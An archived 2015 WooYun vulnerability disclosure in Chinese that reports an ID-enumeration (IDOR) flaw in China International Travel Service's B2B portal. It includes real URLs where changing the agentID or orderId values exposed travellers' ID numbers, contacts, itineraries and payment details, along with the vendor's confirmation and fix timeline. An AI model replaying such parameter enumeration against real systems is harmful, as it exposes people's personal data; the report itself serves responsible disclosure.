乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-12: 细节已通知厂商并且等待厂商处理中 2015-07-13: 厂商已经确认,细节仅向厂商公开 2015-07-20: 厂商已经修复漏洞并主动公开,细节向公众公开
黑产尚未利用,厂商加急处理
# 全球各地营业部所有流水+订单号:通过遍历"agentID="来获得不同地区营业部的具体信息,可通过具体日期范围查询如:
http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/credit&page=/SXCreditInfo.do?actionType=creditInfoHisInit&agentID=000179591http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/credit&page=/SXCreditInfo.do?actionType=creditInfoHisInit&agentID=000013098http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/credit&page=/SXCreditInfo.do?actionType=creditInfoHisInit&agentID=000089815http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/credit&page=/SXCreditInfo.do?actionType=creditInfoHisInit&agentID=000014830http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/credit&page=/SXCreditInfo.do?actionType=creditInfoHisInit&agentID=000133596…………
# 出境确认单遍历修改"orderId="获得具体的订单确认信息,泄露旅客出发时间/目的地/人次/证件号/金额/邮件/电话等各类信息如:
http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/outbound&page=/confirmPrintB.do&orderId=041503-25671&status=4&subtoAgentId=000066034&SSMoney=0.00http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/outbound&page=/confirmPrintB.do&orderId=041503-7349&status=7&subtoAgentId=000066034&SSMoney=0.00http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/outbound&page=/confirmPrintB.do&orderId=071507-9225&status=7&subtoAgentId=000066034&SSMoney=0.00…………
无论过去的,还是实时的订单均遭到泄露,来看一张今天的 :
# 订单详单/游客详细信息单遍历"orderId="来获取详单如:
http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/domestic&page=/orderTouristPrintB.do&orderId=041412-10452|000000137|000000137http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/domestic&page=/orderTouristPrintB.do&orderId=041412-10451|000000137|000000137http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/domestic&page=/orderTouristPrintB.do&orderId=041412-104548|000000137|000000137…………
# 各地销售明细单这东西打印下来可以干很多事情了同样,遍历"orderId="如:
http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/domestic&page=/saleList.do&orderId=071507-13461&companyId=GDGLGF&agentId=000000663http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/domestic&page=/saleList.do&orderId=071507-12712&companyId=GDGLGF&agentId=000000663http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/domestic&page=/saleList.do&orderId=071506-9296&companyId=GDGLGF&agentId=000000663…………
黑产尚未利用,你们加急处理,能走高危漏洞流程最好,白帽子平常也非常辛苦
危害等级:高
漏洞Rank:20
确认时间:2015-07-13 09:18
非常感谢您的报告,问题已处理,十分感谢您对中国国旅的支持。
2015-07-20:已修复